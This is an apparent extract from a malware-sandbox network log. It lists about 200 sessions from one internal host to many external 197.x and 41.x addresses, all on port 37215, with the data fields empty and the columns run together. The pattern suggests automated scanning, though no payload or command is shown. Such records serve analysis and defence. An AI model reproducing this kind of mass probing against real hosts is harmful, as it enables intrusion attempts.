                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21765192.168.2.1540212197.78.141.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21766192.168.2.1538686197.114.189.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21767192.168.2.1547414197.40.222.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21768192.168.2.1552736197.59.218.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21769192.168.2.1559526197.180.156.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21770192.168.2.1550878197.26.127.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21771192.168.2.1551702197.111.237.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21772192.168.2.1552230197.216.145.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21773192.168.2.1540310197.157.38.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21774192.168.2.1543304197.89.165.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21775192.168.2.1540972197.198.175.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21776192.168.2.1555076197.247.46.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21777192.168.2.1545936197.111.234.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21778192.168.2.1545730197.247.123.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21779192.168.2.1547874197.222.46.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21780192.168.2.1554938197.221.226.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21781192.168.2.1553102197.208.77.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21782192.168.2.1547066197.32.204.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21783192.168.2.1536846197.46.248.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21784192.168.2.1551468197.40.89.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21785192.168.2.1553680197.87.230.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21786192.168.2.1549696197.124.238.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21787192.168.2.1545066197.22.110.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21788192.168.2.1542768197.42.248.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21789192.168.2.1550970197.24.240.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21790192.168.2.1546262197.226.155.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21791192.168.2.1535780197.212.78.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21792192.168.2.1543082197.179.86.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21793192.168.2.1552262197.214.10.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21794192.168.2.1558590197.28.93.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21795192.168.2.1560560197.228.236.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21796192.168.2.1540878197.93.56.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21797192.168.2.1533000197.21.36.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21798192.168.2.1543764197.161.37.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21799192.168.2.1552946197.110.225.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21800192.168.2.1538410197.187.106.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21801192.168.2.1543062197.137.19.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21802192.168.2.1559918197.88.150.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21803192.168.2.1537336197.160.75.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21804192.168.2.1549126197.45.99.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21805192.168.2.1541472197.79.126.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21806192.168.2.1554200197.168.220.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21807192.168.2.1542608197.143.173.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21808192.168.2.1556898197.111.2.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21809192.168.2.1535384197.83.34.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21810192.168.2.1543084197.99.159.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21811192.168.2.1558958197.219.48.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21812192.168.2.1542190197.18.118.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21813192.168.2.1550836197.45.167.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21814192.168.2.1554154197.245.245.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21815192.168.2.1554942197.230.177.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21816192.168.2.1553498197.237.149.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21817192.168.2.1551880197.6.4.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21818192.168.2.1541764197.222.147.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21819192.168.2.1559986197.30.51.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21820192.168.2.1535330197.207.207.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21821192.168.2.1554454197.91.104.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21822192.168.2.1547880197.245.208.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21823192.168.2.1551846197.168.154.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21824192.168.2.1534092197.6.76.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21825192.168.2.1534860197.218.128.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21826192.168.2.1535316197.129.241.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21827192.168.2.1556194197.230.215.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21828192.168.2.1558118197.8.59.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21829192.168.2.1549436197.38.172.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21830192.168.2.1546284197.78.216.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21831192.168.2.1552868197.98.39.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21832192.168.2.1549994197.129.55.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21833192.168.2.1556764197.167.56.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21834192.168.2.1534620197.68.3.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21835192.168.2.1559354197.29.1.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21836192.168.2.1540688197.157.211.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21837192.168.2.1550256197.97.247.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21838192.168.2.1538398197.85.84.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21839192.168.2.1545938197.107.233.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21840192.168.2.1559224197.29.44.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21841192.168.2.1545512197.55.109.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21842192.168.2.1542424197.58.133.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21843192.168.2.1551956197.87.49.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21844192.168.2.1558324197.85.10.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21845192.168.2.1546998197.93.219.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21846192.168.2.1536146197.138.183.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21847192.168.2.1543416197.144.172.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21848192.168.2.1542748197.148.83.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21849192.168.2.1544972197.157.13.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21850192.168.2.1549396197.17.130.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21851192.168.2.1542752197.117.234.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21852192.168.2.1558880197.160.240.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21853192.168.2.1545396197.63.47.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21854192.168.2.1536364197.222.86.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21855192.168.2.153318241.161.187.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21856192.168.2.153453041.51.47.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21857192.168.2.156060041.110.56.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21858192.168.2.153609441.198.128.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21859192.168.2.155185041.21.69.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21860192.168.2.155568641.150.113.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21861192.168.2.153960041.38.87.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21862192.168.2.155251241.192.131.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21863192.168.2.155078841.11.100.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21864192.168.2.154997241.51.208.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21865192.168.2.155970041.149.26.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21866192.168.2.153329241.135.43.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21867192.168.2.154957641.15.121.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21868192.168.2.155949841.203.89.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21869192.168.2.153868841.43.50.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21870192.168.2.153636841.148.53.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21871192.168.2.155090641.91.69.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21872192.168.2.156051641.209.103.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21873192.168.2.155837041.66.248.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21874192.168.2.155620041.138.27.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21875192.168.2.155383841.225.26.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21876192.168.2.155555841.163.92.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21877192.168.2.153611641.160.141.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21878192.168.2.153497441.242.234.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21879192.168.2.153301441.223.114.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21880192.168.2.154227641.209.88.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21881192.168.2.154598841.121.164.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21882192.168.2.155561041.62.40.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21883192.168.2.155591841.133.144.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21884192.168.2.153340841.129.145.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21885192.168.2.155319041.19.153.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21886192.168.2.154576641.67.58.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21887192.168.2.154836041.1.17.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21888192.168.2.154558041.81.120.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21889192.168.2.155027441.179.60.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21890192.168.2.153836241.98.136.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21891192.168.2.154798241.124.7.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21892192.168.2.154819841.146.147.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21893192.168.2.155380441.125.98.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21894192.168.2.154876441.110.245.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21895192.168.2.155549641.89.103.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21896192.168.2.155039441.20.240.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21897192.168.2.154109241.128.218.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21898192.168.2.155254841.254.76.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21899192.168.2.154772641.84.28.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21900192.168.2.153328041.27.42.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21901192.168.2.153946441.142.208.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21902192.168.2.154379641.196.223.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21903192.168.2.153496641.131.206.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21904192.168.2.155092041.109.91.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21905192.168.2.154581241.240.50.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21906192.168.2.155598841.110.239.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21907192.168.2.154169641.208.254.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21908192.168.2.155939241.98.220.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21909192.168.2.155927041.229.231.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21910192.168.2.155964241.80.245.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21911192.168.2.153603441.215.234.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21912192.168.2.154388041.246.189.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21913192.168.2.153439241.194.241.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21914192.168.2.154362641.75.153.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21915192.168.2.155137841.173.76.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21916192.168.2.155406241.227.27.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21917192.168.2.155340641.49.64.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21918192.168.2.156018041.23.62.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21919192.168.2.154764841.105.143.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21920192.168.2.153574441.42.254.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21921192.168.2.153426441.17.101.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21922192.168.2.155795641.11.30.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21923192.168.2.153801241.142.37.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21924192.168.2.155642641.143.29.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21925192.168.2.155843641.152.0.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21926192.168.2.153310441.63.111.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21927192.168.2.155125041.181.48.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21928192.168.2.155852441.225.165.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21929192.168.2.153398441.15.13.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21930192.168.2.155973241.129.180.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21931192.168.2.155600641.136.91.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21932192.168.2.155035441.87.31.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21933192.168.2.155671441.197.20.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21934192.168.2.155105641.30.3.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21935192.168.2.153372641.94.182.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21936192.168.2.153608841.250.24.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21937192.168.2.153733641.226.136.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21938192.168.2.153606641.54.147.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21939192.168.2.155358241.35.159.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21940192.168.2.154720241.54.75.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21941192.168.2.153431641.205.86.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21942192.168.2.153647241.155.33.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21943192.168.2.153428241.129.145.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21944192.168.2.154480841.25.227.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21945192.168.2.153770241.21.117.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21946192.168.2.153450441.126.248.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21947192.168.2.153883841.124.150.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21948192.168.2.155840241.143.223.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21949192.168.2.153569641.176.71.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21950192.168.2.155096241.196.239.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21951192.168.2.153630641.8.110.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21952192.168.2.155395641.118.79.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21953192.168.2.153686441.134.48.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21954192.168.2.155962041.57.88.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21955192.168.2.153961041.145.154.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21956192.168.2.153906641.60.87.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21957192.168.2.154472641.30.134.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21958192.168.2.153773041.181.141.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21959192.168.2.155705241.238.100.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21960192.168.2.153781041.233.206.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21961192.168.2.153289841.206.54.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21962192.168.2.155188441.52.246.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21963192.168.2.154372041.99.54.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21964192.168.2.154362041.135.192.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21965192.168.2.154798641.24.152.6637215
                                                                            TimestampBytes transferredDirectionData


